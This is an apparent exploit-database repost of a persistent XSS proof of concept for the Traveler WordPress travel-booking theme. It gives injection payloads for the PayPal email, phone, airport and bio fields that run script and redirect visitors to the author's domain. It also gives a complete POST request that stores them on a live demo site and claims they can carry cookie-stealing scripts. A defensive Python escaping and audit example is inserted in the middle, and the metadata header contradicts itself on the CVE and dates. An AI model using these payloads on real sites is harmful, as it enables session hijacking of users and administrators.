Travel Booking WordPress Theme v2.7.8.5 Persistent XSS

CVE: CVE-2021-24564
Category: CWE-79
Price: $500
Severity: Critical
Author: Unknown
Risk: High
Exploitation Type: Remote
Date: 2020-01-11
CVSS: CVSS:4.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
EPSS: 0.86
EPSSP: 0.132

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020010083

Below is a copy:

# Exploit Title: Travel Booking WordPress Theme v2.7.8.5 Persistent XSS
# Google Dork: /wp-content/themes/traveler/
# Date: 11/01/2020
# Exploit Author: m0ze
# Vendor Homepage: https://travelerwp.com/
# Software Link: https://themeforest.net/item/traveler-traveltourbooking-wordpress-theme/10822683
# Version: 2.7.8.5
# Tested on: Kali Linux
# CVE: -
# CWE: 79


----[]- Info: -[]----
Demo website: https://mixmap.travelerwp.com/
PoC Profile: https://mixmap.travelerwp.com/author/m0ze2/


----[]- Persistent XSS -> User Profile: -[]----
A payload stored in these profile fields can carry any cookie-stealing script to hijack a user or administrator session, or force a redirect to a malicious website. Vulnerable input fields: Paypal Email, Phone Number and Home Airport. Vulnerable textarea: About Yourself.

Payload Sample (for input): "><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>
Payload Sample (for textarea): </textarea><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>
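The two payload shapes differ only in the HTML context they escape from: the first closes a quoted value="" attribute, the second closes a textarea body. As an added illustration (not the theme's code), the Python below sketches the unescaped rendering pattern next to context-aware encoding that neutralizes both, plus an audit helper for profile values already stored before a fix; the field names are the form fields from the PoC, the renderers and helper names are assumptions.

```python
import html
import re

# Constructed samples: the two payload shapes from the advisory.
ATTR_PAYLOAD = '"><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>'
TEXTAREA_PAYLOAD = '</textarea><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>'


def render_unescaped(field, value):
    """Vulnerable pattern (assumed): the stored profile value is echoed
    straight back into the settings form without output encoding."""
    if field == "st_bio":
        return f'<textarea name="st_bio">{value}</textarea>'
    return f'<input type="text" name="{field}" value="{value}">'


def render_escaped(field, value):
    """Hardened pattern: encode for the context the value lands in.
    For an attribute, quotes and angle brackets must be encoded (what
    WordPress's esc_attr() does); inside a textarea body, encoding
    & < > is enough (esc_textarea()). html.escape covers both."""
    if field == "st_bio":
        return f'<textarea name="st_bio">{html.escape(value, quote=False)}</textarea>'
    return f'<input type="text" name="{field}" value="{html.escape(value, quote=True)}">'


def breaks_out(markup, field):
    """Regression check: does the rendered markup contain any tag other
    than the single element the field was meant to produce?"""
    tags = re.findall(r"<\s*/?\s*([a-zA-Z]+)", markup)
    expected = {"textarea"} if field == "st_bio" else {"input"}
    return any(t.lower() not in expected for t in tags)


def audit_profile_fields(meta):
    """Incident-response helper: persistent XSS survives the code fix, so
    list stored profile fields that still hold markup or script-like data.
    `meta` is a dict of field name -> stored value (constructed input)."""
    suspicious = re.compile(r"<|javascript:|on\w+\s*=", re.IGNORECASE)
    return sorted(f for f, v in meta.items() if v and suspicious.search(v))


if __name__ == "__main__":
    for field, payload in (("st_paypal_email", ATTR_PAYLOAD), ("st_bio", TEXTAREA_PAYLOAD)):
        print(field, "unescaped breaks out:", breaks_out(render_unescaped(field, payload), field))
        print(field, "escaped breaks out:  ", breaks_out(render_escaped(field, payload), field))
    print("fields to clean:", audit_profile_fields({"st_phone": ATTR_PAYLOAD, "st_city": "Paris"}))
```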

PoC:

POST /page-user-setting/?sc=setting&id_user HTTP/1.1
Host: mixmap.travelerwp.com
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------191691572411478
Content-Length: 2210
Origin: https://mixmap.travelerwp.com
Connection: close
Referer: https://mixmap.travelerwp.com/page-user-setting/?sc=setting&id_user
Cookie: _your_cookies_here_
Upgrade-Insecure-Requests: 1

-----------------------------191691572411478
Content-Disposition: form-data; name="st_update_user"

ba1d73a992
-----------------------------191691572411478
Content-Disposition: form-data; name="_wp_http_referer"

/page-user-setting/?sc=setting&id_user
-----------------------------191691572411478
Content-Disposition: form-data; name="id_user"

1672
-----------------------------191691572411478
Content-Disposition: form-data; name="st_paypal_email"

"><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>
-----------------------------191691572411478
Content-Disposition: form-data; name="st_email"

[email protected]
-----------------------------191691572411478
Content-Disposition: form-data; name="st_phone"

"><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>
-----------------------------191691572411478
Content-Disposition: form-data; name="st_bio"

</textarea><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>
-----------------------------191691572411478
Content-Disposition: form-data; name="st_is_check_show_info"

on
-----------------------------191691572411478
Content-Disposition: form-data; name="id_avatar"

10928
-----------------------------191691572411478
Content-Disposition: form-data; name="st_avatar"; filename=""
Content-Type: application/octet-stream


-----------------------------191691572411478
Content-Disposition: form-data; name="st_airport"

"><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>
-----------------------------191691572411478
Content-Disposition: form-data; name="st_province"


-----------------------------191691572411478
Content-Disposition: form-data; name="st_address"


-----------------------------191691572411478
Content-Disposition: form-data; name="st_zip_code"


-----------------------------191691572411478
Content-Disposition: form-data; name="st_city"


-----------------------------191691572411478
Content-Disposition: form-data; name="st_country"


-----------------------------191691572411478
Content-Disposition: form-data; name="st_btn_update"

Save Changes
-----------------------------191691572411478--
